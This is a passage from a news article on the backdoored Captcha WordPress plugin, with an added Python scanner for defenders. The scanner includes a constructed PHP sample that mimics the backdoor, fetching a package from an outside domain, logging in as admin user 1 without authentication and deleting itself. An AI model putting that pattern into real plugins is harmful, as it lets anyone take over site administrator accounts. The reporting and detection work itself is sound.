A WordPress plugin installed on over 300,000 sites was recently modified to download and install a hidden backdoor. The WordPress team has intervened, removed the plugin from the official WordPress Plugins repository, and published clean versions for affected sites.

Known only as Captcha, the plugin was one of the most popular CAPTCHA plugins on the official WordPress site and was the work of a well-established plugin developer named BestWebSoft, a company behind many other popular WordPress plugins.

Plugin sold in September, backdoored in December

BestWebSoft sold the free version of its Captcha plugin to a new developer named Simply WordPress on September 5, according to a blog post on the company’s site.

Exactly three months after the sale, the plugin’s new owner shipped Captcha version 4.3.7, which contained malicious code that would connect to the simplywordpress.net domain and download a plugin update package from outside the official WordPress repository, a practice WordPress.org rules prohibit. This update package silently installed a backdoor on sites using the plugin.

“This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself,” says Matt Barry, Wordfence security researcher. “The backdoor installation code is unauthenticated, meaning anyone can trigger it.”

Further, the plugin also contains code to trigger a clean update that removes all traces of the backdoor, should the attacker decide to cover their tracks.
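The two behaviours described above, a session established for a hard-coded user ID without any authentication and an update package pulled from a host other than the official repository, are both visible in plugin source and can be flagged with a simple scan. The script below is an added example for defenders reviewing a plugin update; it is not code from the article, from Wordfence, or from the plugin, and the sample PHP fragments it scans are constructed for this example (the URL path under simplywordpress.net is made up, only the domain is from the article). The host allowlist and the list of fetch functions are assumptions a reviewer would tune for their own site.

```python
"""Heuristic scanner for two backdoor behaviours in WordPress plugin source:
a session created for a hard-coded user ID, and packages fetched from a host
other than the official WordPress.org repository. Added example; not code
from the article, from Wordfence, or from the Captcha plugin.
"""
import re
from urllib.parse import urlparse

# Hosts a WordPress.org-hosted plugin is expected to fetch packages from.
# Assumption: any other host in a download call is worth manual review.
OFFICIAL_HOSTS = {"wordpress.org", "downloads.wordpress.org", "api.wordpress.org"}

# WordPress helpers that log the current request in as a given user; a literal
# numeric ID (the backdoor used 1, the first admin) is the suspicious shape.
_SESSION_RE = re.compile(r"\b(wp_set_current_user|wp_set_auth_cookie)\s*\(\s*(\d+)\s*[,)]")
# PHP/WordPress functions that fetch remote content or packages (assumed list).
_FETCH_RE = re.compile(r"\b(download_url|wp_remote_get|wp_remote_post|file_get_contents|curl_setopt)\s*\(")
_URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+[^\s'\"]*")
# A file removing itself after running is a classic trace-cleanup step.
_SELF_DELETE_RE = re.compile(r"\bunlink\s*\(\s*__FILE__\s*\)")


def scan_plugin_source(path, source):
    """Scan one plugin file and return a list of findings, each a dict with
    'path', 'line', 'kind' and 'detail'. An empty list means nothing matched."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in _SESSION_RE.finditer(line):
            findings.append({
                "path": path, "line": lineno, "kind": "hardcoded_session",
                "detail": "%s() called with literal user ID %s" % (m.group(1), m.group(2)),
            })
        if _FETCH_RE.search(line):
            for url in _URL_RE.findall(line):
                host = urlparse(url).hostname or ""
                if host not in OFFICIAL_HOSTS:
                    findings.append({
                        "path": path, "line": lineno, "kind": "offsite_fetch",
                        "detail": "fetches %s (host %s not in allowlist)" % (url, host),
                    })
        if _SELF_DELETE_RE.search(line):
            findings.append({
                "path": path, "line": lineno, "kind": "self_delete",
                "detail": "file deletes itself after running",
            })
    return findings


def scan_files(files):
    """Scan a mapping of path -> source text and return all findings."""
    results = []
    for path, source in files.items():
        results.extend(scan_plugin_source(path, source))
    return results


# Constructed sample fragments, not the real plugin's code. The first mirrors
# the pattern the article describes; the second is a normal login handler that
# sets the cookie for whichever user wp_signon() actually authenticated.
SUSPICIOUS_FILE = """<?php
// runs on every request, no capability check
add_action('init', 'cp_update_check');
function cp_update_check() {
    $pkg = download_url('https://simplywordpress.net/update.zip'); // path made up
    wp_set_current_user(1);
    wp_set_auth_cookie(1, true);
    @unlink(__FILE__);
}
"""

BENIGN_FILE = """<?php
function cp_login_form_handler($creds) {
    $user = wp_signon($creds, is_ssl());
    if (!is_wp_error($user)) {
        wp_set_current_user($user->ID);
        wp_set_auth_cookie($user->ID, true);
    }
    $info = wp_remote_get('https://api.wordpress.org/plugins/info/1.2/');
}
"""

if __name__ == "__main__":
    for f in scan_files({"suspicious.php": SUSPICIOUS_FILE, "benign.php": BENIGN_FILE}):
        print("%s:%d %s: %s" % (f["path"], f["line"], f["kind"], f["detail"]))
```

The scan is deliberately a heuristic: a literal numeric user ID passed to the session helpers is almost never legitimate, whereas the benign handler passes the ID returned by wp_signon() and produces no finding. The host allowlist catches the off-repository download regardless of which domain is used, so it does not depend on knowing simplywordpress.net in advance.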

Backdoor discovered by accident

Initially, the update didn’t catch…